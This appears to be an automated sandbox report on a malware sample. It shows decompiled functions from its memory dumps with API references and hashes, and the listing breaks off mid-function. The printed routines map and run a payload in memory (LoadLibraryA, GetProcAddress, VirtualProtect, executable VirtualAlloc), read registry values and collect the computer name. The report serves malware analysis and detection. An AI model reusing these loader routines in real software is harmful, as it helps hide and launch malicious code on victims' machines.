Instruction ID: 1caff0e5d2961c318858f6bb2b0d7f99fceebbb811b198e9e8c3a8d3f04173f9
Opcode Fuzzy Hash: 83e6e04bcd366fded1c35c8b269c89bea0f76d85a8c834e0f0ae9599731ac213
Instruction Fuzzy Hash: 762190B2900209EFEB20CF94CC95FEDB7F9FB04395F254499E6409B146D3759A85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000133E, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000133E() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x10004144;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f4;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E10001B3D(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E1000140B( &_v32,  &_v16,  *0x10004140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E10001266(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x10004138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E10001E8D(_v28); // executed
				}
				ExitThread(_t25);
			}

0x10001344
0x10001355
0x1000135f
0x10001357
0x10001357
0x10001357
0x10001366
0x1000136f
0x10001374
0x10001392
0x100013ed
0x10001394
0x1000139a
0x100013a0
0x100013a0
0x100013ae
0x100013b2
0x100013b9
0x100013bb
0x100013bf
0x100013c1
0x100013c8
0x100013dc
0x100013ca
0x100013d0
0x100013d5
0x100013c8
0x100013e4
0x100013e4
0x100013ef

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 1000139A
memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 100013D0
ExitThread.KERNEL32 ref: 100013EF

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ExitThreadlstrlenmemcpy
String ID:
API String ID: 3726537860-0
Opcode ID: e02dfd363db0967d0870aff3b157c598f88e346b5e58301aa368e4c84523a345
Instruction ID: 3896a0d8cea4ba724126f95b9eff81958b59e96603957c53bc3dc28b2077132e
Opcode Fuzzy Hash: e02dfd363db0967d0870aff3b157c598f88e346b5e58301aa368e4c84523a345
Instruction Fuzzy Hash: BC118B71104305ABF721DBA1CD84ECBB7ECEB443C0F02482AF504D75A9EB20E6448B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CF4A32, Relevance: 3.9, APIs: 3, Instructions: 155
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CF4A32(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0xcfd2a4; // 0x247a5a8
				_t5 = _t40 + 0xcfee34; // 0x410025
				_t85 = E00CFA822(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E00CF677C(_v16);
					goto L24;
				}
				if(E00CF576C(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E00CF978C(0,  *0xcfd33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0xcfd2a4; // 0x247a5a8
					_t11 = _t52 + 0xcfe81a; // 0x65696c43
					_t55 = E00CF978C(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E00CF63A4(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E00CF677C(_t87);
					}
					if(_t80 != 0) {
						L17:
						E00CF677C(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E00CF3822(_t86);
						}
						goto L22;
					} else {
						if(( *0xcfd260 & 0x00000001) == 0) {
							L14:
							E00CF4E42(_t80, _v88, _v84,  *0xcfd270, 0);
							_t80 = E00CF10AB(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E00CF2997( &_v40, 0);
							}
							E00CF677C(_v88);
							goto L17;
						}
						_t67 =  *0xcfd2a4; // 0x247a5a8
						_t18 = _t67 + 0xcfe823; // 0x65696c43
						_t70 = E00CF978C(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E00CF63A4(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E00CF677C(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x00cf4a44
0x00cf4a47
0x00cf4a4e
0x00cf4a54
0x00cf4a55
0x00cf4a56
0x00cf4a57
0x00cf4a58
0x00cf4a59
0x00cf4a61
0x00cf4a6d
0x00cf4a6f
0x00cf4a74
0x00cf4bc4
0x00cf4bc7
0x00cf4bcb
0x00cf4bcb
0x00cf4a86
0x00cf4a8e
0x00cf4bb7
0x00cf4bb8
0x00cf4bbb
0x00000000
0x00cf4bbb
0x00cf4aa0
0x00cf4aa2
0x00cf4aa2
0x00cf4aad
0x00cf4ab2
0x00cf4ab7
0x00cf4ba6
0x00000000
0x00cf4abd
0x00cf4abd
0x00cf4ac2
0x00cf4acb
0x00cf4ad0
0x00cf4ad9
0x00cf4afc
0x00cf4adb
0x00cf4af1
0x00cf4af3
0x00cf4af3
0x00cf4aff
0x00cf4b9a
0x00cf4b9d
0x00cf4ba7
0x00cf4ba7
0x00cf4bac
0x00cf4bae
0x00cf4bae
0x00000000
0x00cf4b05
0x00cf4b0c
0x00cf4b4d
0x00cf4b5e
0x00cf4b74
0x00cf4b78
0x00cf4b7d
0x00cf4b83
0x00cf4b90
0x00cf4b90
0x00cf4b95
0x00000000
0x00cf4b95
0x00cf4b0e
0x00cf4b13
0x00cf4b1c
0x00cf4b21
0x00cf4b25
0x00cf4b48
0x00cf4b27
0x00cf4b3d
0x00cf4b3f
0x00cf4b3f
0x00cf4b4b
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf4b4b
0x00cf4aff

APIs

memset.NTDLL ref: 00CF4A47

Part of subcall function 00CFA822: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00CF4A6D,00410025,00000005,?,00000000), ref: 00CFA833
Part of subcall function 00CFA822: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00CFA850

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00CF4A7B
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00CF4A86

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: 6172de931bbff71986e9d949c70bb9e50cec8f8b7ace753e13db82c4537878a7
Instruction ID: 616609fb2c9bfc6644fb7df9e67a06ba22db33fd888444e02999f5d260393661
Opcode Fuzzy Hash: 6172de931bbff71986e9d949c70bb9e50cec8f8b7ace753e13db82c4537878a7
Instruction Fuzzy Hash: 53413B7290061DAFDB95AFE4CC85EFFBBBDAF08344B104066BB01A7112D675DE049792

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8F16, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CF8F16(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00CF6466(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xcfd2a4; // 0x247a5a8
						_t20 = _t68 + 0xcfe1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00CF92F3(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00cf8f1c
0x00cf8f1f
0x00cf8f2f
0x00cf8f38
0x00cf8f3c
0x00cf900a
0x00cf9010
0x00cf9010
0x00cf8f56
0x00cf8f5b
0x00cf8f5f
0x00cf8f65
0x00cf8f6a
0x00cf8f71
0x00cf8f80
0x00cf8f80
0x00cf8f84
0x00cf8f86
0x00cf8f92
0x00cf8f9d
0x00cf8fa8
0x00cf8fac
0x00cf8fb6
0x00cf8fba
0x00cf8fbc
0x00cf8fc1
0x00cf8fc8
0x00cf8fd8
0x00cf8fd8
0x00cf8fc1
0x00cf8fba
0x00cf8fda
0x00cf8fdf
0x00cf8fe4
0x00cf8fe4
0x00cf8fe7
0x00cf8ff0
0x00cf8ff5
0x00cf8ff5
0x00cf8ffa
0x00cf8fff
0x00cf8fff
0x00cf8ffa
0x00cf8f84
0x00cf9001
0x00cf9007
0x00000000

APIs

Part of subcall function 00CF6466: SysAllocString.OLEAUT32(80000002), ref: 00CF64C3
Part of subcall function 00CF6466: SysFreeString.OLEAUT32(00000000), ref: 00CF6529

SysFreeString.OLEAUT32(?), ref: 00CF8FF5
SysFreeString.OLEAUT32(00CF6843), ref: 00CF8FFF

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 893fb0dddbf9602209ce3f9aec90aad2da540bccea884a50cd9bcde70067881d
Instruction ID: e11709d7134e1f11a17496c269f52748bcbb984e4921e0f2de82e71e62b5d09e
Opcode Fuzzy Hash: 893fb0dddbf9602209ce3f9aec90aad2da540bccea884a50cd9bcde70067881d
Instruction Fuzzy Hash: 10313972500119EFCB21DF94C888DABBB7AFBC97407144658FA159B210D632ED91DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C80EC0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00C80F44

Strings

VirtualAlloc, xrefs: 00C80F29, 00C80F2C

Memory Dump Source

Source File: 00000001.00000002.590451762.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: 3c4648296c28811c9a125f72c86513bdc30f285cc69b1cc23958ce6d915c1d55
Instruction ID: c9f24522fc2af03fc6051b36a4d59f5c9701335dbca6141406df2ba202216687
Opcode Fuzzy Hash: 3c4648296c28811c9a125f72c86513bdc30f285cc69b1cc23958ce6d915c1d55
Instruction Fuzzy Hash: D7113060D0828DDAFB01DBE8C4097EEBFB55B11708F044098D9846A282D2BA575887A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CF6111, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CF6111(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00CF8D59(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00CF677C(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x00cf6116
0x00cf6121
0x00cf6123
0x00cf6129
0x00cf612b
0x00cf6130
0x00cf6139
0x00cf613d
0x00cf6146
0x00cf614a
0x00cf6159
0x00cf614c
0x00cf614d
0x00cf6152
0x00cf6152
0x00cf614a
0x00cf613d
0x00cf6162

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,00CF1DD9,74B5F710,00000000,?,?,00CF1DD9), ref: 00CF6129

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

GetComputerNameExA.KERNELBASE(00000003,00000000,00CF1DD9,00CF1DDA,?,?,00CF1DD9), ref: 00CF6146

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: d34d7c82c6887dadbec569111fb548f847c8e90b5634255738cf3f18f4f3f634
Instruction ID: 4f15fbfb8588e90cb195c8c69c1520581d8ff5741cde519a1e9cf85ddb2f9fac
Opcode Fuzzy Hash: d34d7c82c6887dadbec569111fb548f847c8e90b5634255738cf3f18f4f3f634
Instruction Fuzzy Hash: 97F09026A0010DBAE710DA9A8D00FBFA7BC9BC5740F100056A614D3241EA70DF019762

Uniqueness

Uniqueness Score: -1.00%

Function 00CF918C, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xcfd23c) == 0) {
						E00CF20BE();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xcfd23c) == 1) {
						_t10 = E00CF1000(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x00cf9193
0x00cf9194
0x00cf9197
0x00cf91c9
0x00cf91cb
0x00cf91cb
0x00cf9199
0x00cf919a
0x00cf91af
0x00cf91b6
0x00cf91b8
0x00cf91b8
0x00cf91b6
0x00cf919a
0x00cf91d3

APIs

InterlockedIncrement.KERNEL32(00CFD23C), ref: 00CF91A1

Part of subcall function 00CF1000: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1013

InterlockedDecrement.KERNEL32(00CFD23C), ref: 00CF91C1

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 311b5178757c0a2130fce5581c49a67b9fe7ce49fba3b07a77f6a0df36702cc5
Instruction ID: a3d0a896cd3f639b5c82026ac0f7deddcc4b2dc904f2780ca2a7813198c25e0f
Opcode Fuzzy Hash: 311b5178757c0a2130fce5581c49a67b9fe7ce49fba3b07a77f6a0df36702cc5
Instruction Fuzzy Hash: 02E01A3130412E968EB11AA8890DB7EA541DB11781F018436FBA2D00B4DA20CD41EA97

Uniqueness

Uniqueness Score: -1.00%

Function 00CF5974, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00CF5974(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xcfd2a4; // 0x247a5a8
				_t4 = _t15 + 0xcfe39c; // 0x3178944
				_t20 = _t4;
				_t6 = _t15 + 0xcfe124; // 0x650047
				_t17 = E00CF8F16(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00CF97DE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00cf597e
0x00cf5985
0x00cf5986
0x00cf5987
0x00cf5988
0x00cf598e
0x00cf5993
0x00cf5993
0x00cf599d
0x00cf59af
0x00cf59b6
0x00cf59e4
0x00cf59b8
0x00cf59ba
0x00cf59bf
0x00cf59e1
0x00cf59c1
0x00cf59c4
0x00cf59cb
0x00cf59d0
0x00cf59d2
0x00cf59d2
0x00cf59d7
0x00cf59d7
0x00cf59bf
0x00cf59eb

APIs

Part of subcall function 00CF8F16: SysFreeString.OLEAUT32(?), ref: 00CF8FF5

Part of subcall function 00CF97DE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00CF6186,004F0053,00000000,?), ref: 00CF97E7
Part of subcall function 00CF97DE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00CF6186,004F0053,00000000,?), ref: 00CF9811
Part of subcall function 00CF97DE: memset.NTDLL ref: 00CF9825

SysFreeString.OLEAUT32(00000000), ref: 00CF59D7

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 50414ffb99278e6f23215c44b3b30016ba0008bf60a890fb07837290f8262c44
Instruction ID: 0e4b9f233410c4784587afa8b915ead1e4ab7e3e7785d31a45ac4bc0a58eabe2
Opcode Fuzzy Hash: 50414ffb99278e6f23215c44b3b30016ba0008bf60a890fb07837290f8262c44
Instruction Fuzzy Hash: FB019E3260051DBFDB459FA8CD05ABEBBB9EB04310B000061EB15E7060E7B09E12D792

Uniqueness

Uniqueness Score: -1.00%

Function 10001B3D, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10001B3D(void* __eax, intOrPtr _a4) {

				 *0x10004150 =  *0x10004150 & 0x00000000;
				_push(0);
				_push(0x1000414c);
				_push(1);
				_push(_a4);
				 *0x10004148 = 0xc; // executed
				L100010D6(); // executed
				return __eax;
			}

0x10001b3d
0x10001b44
0x10001b46
0x10001b4b
0x10001b4d
0x10001b51
0x10001b5b
0x10001b60

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(1000136B,00000001,1000414C,00000000), ref: 10001B5B

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: daffe624ca004600be1b8070525a12d8ceef1cc4049257a669a48c770c26d2d3
Instruction ID: 3d2b0921c52f1de11b6451a66fa5fceab569c7460954b043f0a25770e4193190
Opcode Fuzzy Hash: daffe624ca004600be1b8070525a12d8ceef1cc4049257a669a48c770c26d2d3
Instruction Fuzzy Hash: B2C04CF8140350A6F620DB809C85FC57A51B7A4785F124504F250252D9CBF510D4851D

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8D59, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF8D59(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xcfd238, 0, _a4); // executed
				return _t2;
			}

0x00cf8d65
0x00cf8d6b

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e23c72abefd6d78989a4850b6780cdb41ddc2921f585f2fab52b47dec7e06e7f
Instruction ID: e1bf0bc27917564f9806e32a037212cf04f3e143acf3ca8c6c66ef54d68bc208
Opcode Fuzzy Hash: e23c72abefd6d78989a4850b6780cdb41ddc2921f585f2fab52b47dec7e06e7f
Instruction Fuzzy Hash: 69B01231140100FBCB014B00DE08F1DBB22AF50700F118010B2010407087324821EB17

Uniqueness

Uniqueness Score: -1.00%

Function 10001E8D, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10001E8D(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E100018E1( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E10001854( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t23 = E100010DC(_t33, _t37); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E100015BC(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E10001E78(_t35);
					L8:
					return _t28;
				}
			}

0x10001e95
0x10001eb2
0x10001eb9
0x10001f18
0x00000000
0x10001ebb
0x10001ebb
0x10001ec5
0x10001ec9
0x10001ece
0x10001ed2
0x10001ed7
0x10001edb
0x10001ee0
0x10001ee5
0x10001ee9
0x10001eee
0x10001eef
0x10001ef3
0x10001ef8
0x10001f00
0x10001f00
0x10001ef8
0x10001ee9
0x10001edb
0x10001f02
0x10001f0b
0x10001f0f
0x10001f19
0x10001f1f
0x10001f1f

APIs

Part of subcall function 100018E1: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,10001EB7,?,?,?,?,00000002,?,?), ref: 10001906
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001928
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 1000193E
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001954
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 1000196A
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001980

Part of subcall function 10001854: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,10001EC5,?,?,?,?,?,?,00000002), ref: 1000188B
Part of subcall function 10001854: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 100018C0

Part of subcall function 100010DC: LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000002), ref: 10001112
Part of subcall function 100010DC: lstrlenA.KERNEL32(?), ref: 10001128
Part of subcall function 100010DC: memset.NTDLL ref: 10001132
Part of subcall function 100010DC: GetProcAddress.KERNEL32(?,00000002), ref: 10001195
Part of subcall function 100010DC: lstrlenA.KERNEL32(-00000002), ref: 100011AA
Part of subcall function 100010DC: memset.NTDLL ref: 100011B4

Part of subcall function 100015BC: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 100015EA
Part of subcall function 100015BC: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001642
Part of subcall function 100015BC: GetLastError.KERNEL32 ref: 10001648

GetLastError.KERNEL32(?,?), ref: 10001EFA

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: 5b4e09b275b9bf9456a116be86b0edfd34f0aa7fdedd34f1755aed87dc6fb2f2
Instruction ID: fe004bb4c71d7bb9e37e360a226a0fa852d7e3fb236af937696d2497153f4d23
Opcode Fuzzy Hash: 5b4e09b275b9bf9456a116be86b0edfd34f0aa7fdedd34f1755aed87dc6fb2f2
Instruction Fuzzy Hash: 47118676600612ABF721D7A98C89DEBB7ECEF48294B010138FA05D7245EBA4FD0587A4

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3402, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CF3402(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xcfd330;
				E00CF94FB();
				while(1) {
					_t8 = E00CF523C(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00CF978C(_t14);
					if(_t15 == 0) {
